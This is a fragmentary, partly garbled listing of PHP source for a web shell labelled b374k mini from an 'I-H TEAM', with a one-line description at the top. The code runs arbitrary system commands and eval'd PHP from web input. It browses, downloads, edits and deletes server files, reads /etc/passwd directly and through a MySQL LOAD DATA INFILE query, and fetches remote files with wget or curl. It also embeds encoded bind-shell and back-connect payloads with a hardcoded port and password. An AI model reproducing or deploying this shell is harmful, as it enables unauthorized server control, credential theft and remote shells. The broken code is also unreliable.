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The code shown implements a basic PHP shell that allows for directory listing, file operations, and network operations.

The code implements a basic PHP shell or web shell that allows remote access and control over the server through a web interface.

It allows for listing directories, viewing, downloading, deleting and creating files and folders on the server through the web interface.


if(isset($_GET['dl']) && ($_GET['dl'] != ""))
$file = $_GET['dl'];
$filez = @file_get_contents($file);
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file)."\";")
echo $filez;
}elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
$file = $_GET['dlgzip'];
$filez = gzencode(@file_get_contents($file));
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file).".gz\"
echo $filez;
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d.$f);
$ext = explode($f,".");
$ext = $ext[count($ext)-1];
@header("Content-type: ".$inf["mime"]);
@header("Cache-control: public");
@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
@header("Cache-control: max-age=".(60*60*24*7));
$ver = "1.01";
$software = getenv("SERVER_SOFTWARE");
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
$safemode = TRUE;
$safemode = FALSE;
$system = @php_uname();
if(strtolower(substr($system,0,3)) == "win")
$win = TRUE;
$win = FALSE;
$pwd = $_GET['view'];
} else

$pwd = $_GET['y'];
if(!$id =
$id =

= rapih(exe("whoami")))
= "";

$prompt = $user." \$ ";

$pwd = @getcwd().DIRECTORY_SEPARATOR;
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$sort_default = "0a";
$sort_save = TRUE;
$user = @get_current_user();
$id = $user;
$prompt = $user." &gt;";
$pwd = realpath(".")."\\";
$v = explode("\\",$d);
$v = $v[0];
foreach (range("A","Z") as $letter)
$bool = @is_dir($letter.":\\");
if ($bool)
$letters .= "<a href=\"?y=".$letter.":\\\">[ ";
if ($letter.":" != $v)
{$letters .= $letter;}
{$letters .= "<span class=\"gaya\">".$letter."</span>";}
$letters .= " ]</a> ";
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
$posix = TRUE;
$posix = FALSE;
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
$my_ip = $_SERVER['REMOTE_ADDR'];
$bindport = "13123";
$bindport_pass = "Bobyhikaru";
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = "";
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
$pathz = "";
for($j = 0 ; $j <= $i ; $j++)
{ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; }

$pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR."

$old = $_POST['oldname'];
$new = $_POST['newname'];
$file = $pwd.$new;
$buff = $software."<br />";
$buff .= $system."<br />";
if($id != "")
$buff .= $id."<br />";
$buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$
my_ip."<br />";
$buff .= "safemode <span class=\"gaya\">ON</span><br />";
$buff .= "safemode <span class=\"gaya\">OFF<span><br />";
$buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
function rapih($text)
return trim(str_replace("<br />","",$text));
function magicboom($text)
if (!get_magic_quotes_gpc())
{ return $text; }
return stripslashes($text);
function showdir($pwd,$prompt)
$fname = array();

$dname = array();
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
$posix = TRUE;
$posix = FALSE;
$user = "????:????";
if($dh = opendir($pwd))
while($file = readdir($dh))
$dname[] = $file;
} elseif(is_file($file))
{ $fname[] = $file; }
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = "";
$buff = " <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margi
n:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</t
d><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"te
xt\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\"
type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
</tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <in
put type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</t
d><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"t
ext\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"i
nputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;
\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th st
yle=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th styl
e=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"
width:190px;\">actions</th></tr> ";
if($tree > 2)
$parent .= $path[$i].DIRECTORY_SEPARATOR;
$parent = $pwd;
foreach($dname as $folder)
if($folder == ".")
if(!$win && $posix)
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group[
} else
{ $owner = $user; }
$buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</
td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><
td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><
span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>

| <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <fo

rm action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"mar
gin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <inp
ut class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"
a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" sty
le=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
} elseif($folder == "..")
if(!$win && $posix)
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group[
} else
{ $owner = $user; }
$buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LIN
K</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."
</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."<
/td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">
newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a
></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\"
style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd
."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdi
r\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"
rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
} else
if(!$win && $posix)
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group[
} else
{ $owner = $user; }
$buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y="
.$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" m
ethod=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"ma
rgin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."
\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;
\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputz
but\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzb
ut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearsp
ace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><
td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</
td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</t
d><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($f
older)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\"
foreach($fname as $file)
$full = $pwd.$file;
if(!$win && $posix)

$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['nam

} else
{ $owner = $user; }
$buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&am
p;view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearsp
ace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input typ
e=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\"
/> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\"
value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename
\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\
" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($f
ile)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-alig
n:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:c
enter;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&amp;
edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link',
'".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full
\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y
$buff .= "</table>"; return $buff;
function ukuran($file)
if($size = @filesize($file))
if($size <= 1024)
return $size;
if($size <= 1024*1024)
$size = @round($size / 1024,2);; return "$size kb";
} else
$size = @round($size / 1024 / 1024,2);
return "$size mb";
} else return "???";
function exe($cmd)
$buff = @ob_get_contents();
return $buff;
} elseif(function_exists('exec'))
$buff = "";
foreach($results as $result){ $buff .= $result; } return $buff;
} elseif(function_exists('passthru'))

$buff = @ob_get_contents();
return $buff;
} elseif(function_exists('shell_exec'))
$buff = @shell_exec($cmd);
return $buff;
function tulis($file,$text)
$textz = gzinflate(base64_decode($text));
if($filez = @fopen($file,"w"))
function ambil($link,$file)
if($fp = @fopen($link,"r"))
$cont.= @fread($fp,1024);
$fp2 = @fopen($file,"w");
function which($pr)
$path = exe("which $pr");
return trim($path);
} else { return trim($pr); }
function download($cmd,$url)
$namafile = basename($url);
case 'wwget':
exe(which('wget')." ".$url." -O ".$namafile);
case 'wlynx':
exe(which('lynx')." -source ".$url." > ".$namafile);
case 'wfread' :

case 'wfetch' :
exe(which('fetch')." -o ".$namafile." -p ".$url);
case 'wlinks' :
exe(which('links')." -source ".$url." > ".$namafile);
case 'wget' :
exe(which('GET')." ".$url." > ".$namafile);
case 'wcurl' :
exe(which('curl')." ".$url." -o ".$namafile);
default: break;
return $namafile;
function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($
mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mo
de & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode
& 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode &
00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 0
0001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearsp
ace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH
+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTo
fr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo
9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m
+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9
cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6Pcth
LEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbON
xiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/J
tsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohY
KCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQ
jTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpm
u2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcC
AHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFa
oTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5s
cfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqN
OElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe3
2X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="
fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktG
B8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVu
lCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYa
gh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxo
KEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="
XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYy
t41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA
7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pn
VYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2
m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNij
Z9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr
4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:[ + ] I-H TEAM [ + ]
</title> <script type="text/javascript"> function tukar(lama,baru){ document.get
ElementById(lama).style.display = 'none'; document.getElementById(baru).style.di
splay = 'block'; } </script> <style type="text/css"> body{ background:#000000;;
} a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ fon
t-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ backgroun
d:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; backgr
ound:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ backgro

und:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .t

abnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%;
} .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px;
border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ ba
ckground:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inpu
tz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px soli
d #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height
:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{
padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-siz
e:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0
; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100
%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6p
x 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333;
font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:1
6px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore
{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:
1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8
px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1
px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ backgrou
nd:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:non
e; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(
'cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="h
ead_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class=
"b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $
ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div
> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?ph
p echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell
">shell</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a> <a href="?<?p
hp echo "y=".$pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&
amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">n
etsploit</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">upload</a> <a hre
f="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a> <a href="http://indonesianhac
ker.or.id/forum.php" target="_blank"http://indonesianhacker.or.id/forum.php" tar
get="_blank">I-H TEAM</a> <a href="http://Bobyhikaru.biz" target="_blank"http://
Bobyhikaru.biz" target="_blank">Bobyhikaru</a> <a href="http://iht.cc/shell"http
://iht.cc/shell" target="_blank" target="_blank">Shell c0de</a> </div> <!-- menu
end --> <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="
?y=<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td>
<textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'
])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('
/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzb
ut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </f
orm> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GE
T['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_G
ET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlp
ass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($s
qlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding
:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\"
>@</span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt
;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&a
>[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"g
aya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$s
t."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_
GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp
;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqlus
p;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .=
"</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($

con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET

['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP T
ABLE IF EXISTS Bobyhikaru_table;\nCREATE TABLE `Bobyhikaru_table` ( `file` LONGB
LOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Bobyhikaru_table;S
ELECT * FROM Bobyhikaru_table;\nDROP TABLE IF EXISTS Bobyhikaru_table;"; $msg =
"<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <in
put type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name
=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sql
host."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <i
nput type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hi
dden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"
db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=
\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" s
tyle=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
</form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"wi
dth:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_
tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($t
ables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a
table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['tab
le']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table'
]; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style
=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"
hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" valu
e=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
<input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\
"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name
=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=
\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p>
<textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".
$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name
=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns
= array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @m
ysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fet
ch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"
; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) =
mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $p
age = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".
$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"
; foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td
>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"pad
ding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\"
name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql
\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input t
ype=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\"
name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpas
s\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."
\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select
class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <
= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i ==
$_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</opt
ion>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\"
value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(i
sset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $qu
ery = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10p
x;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=
\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type
=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" na

me=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\"

value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sq
lpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textare
a name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."
</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submi
tquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db
($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query
) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:
0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</
span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" s
tyle=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "
<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; f
or($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $ms
g .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $
dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg
.= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:2
0px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> erro
r <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\n
SHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"
><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".
$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"h
idden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\
"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" val
ue=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpas
s."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea na
me=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</te
xtarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitque
ry\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg
.= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</
th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($h
asil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr
><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$s
/a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p st
yle=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{
?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php ec
ho $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tab
net" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
<tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" typ
e="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Usern
